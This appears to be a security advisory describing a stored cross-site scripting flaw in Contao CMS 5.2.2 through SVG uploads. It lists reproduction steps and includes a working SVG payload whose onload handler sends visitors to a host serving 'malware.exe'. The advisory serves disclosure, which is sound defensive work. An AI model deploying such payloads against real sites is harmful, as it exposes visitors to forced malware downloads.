Contao CMS | Stored XSS via SVG file upload
Information
| Software Type | Web App |
|---|---|
| Software Name | Contao CMS |
| Affected Version | 5.2.2 |
| Software Vendor | Contao CMS |
| Software Link | https://github.com/contao/contao |
| Severity | Medium |
| CVSS Score | 5.7 |
| CVE Link | N/A |
| Affected Assets | 84092+ |
| Date of Discovery | March 10th, 2025 |
| PoC Exploit | N/A |
Description
Contao version 5.2.2 allows all backend users with file upload permissions to upload SVG files. There are no filters in place to protect against JavaScript inside SVG files, this allows us to embed malicious JavaScript code and run it. Although we don't have access to document.cookie, we can still force a malicious file download in user's computer.
Reproduce
To reproduce this issue, login as a backend user with file upload permissions. Visit /contao?do=files and click “Expand all” button, this will expand all the file directories and display a green + symbol on directories that you can upload files to.
Click to upload a file and create the following SVG file:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="window.location.href='http://127.0.0.1:8000/malware.exe';"><rect width="200" height="200" fill="lightblue" /></svg>Upload it and open it, its URL might change into something like this:
https://testhub.local/assets/images/6/xss-jngpk00yy1y1gjp.svg
This will run malicious JavaScript that downloads a malware.exe file inside user's computer upon visiting the image.
Proof of Concept (PoC) Video
No PoC video available.
Posted on: May 24, 2025 04:01 AM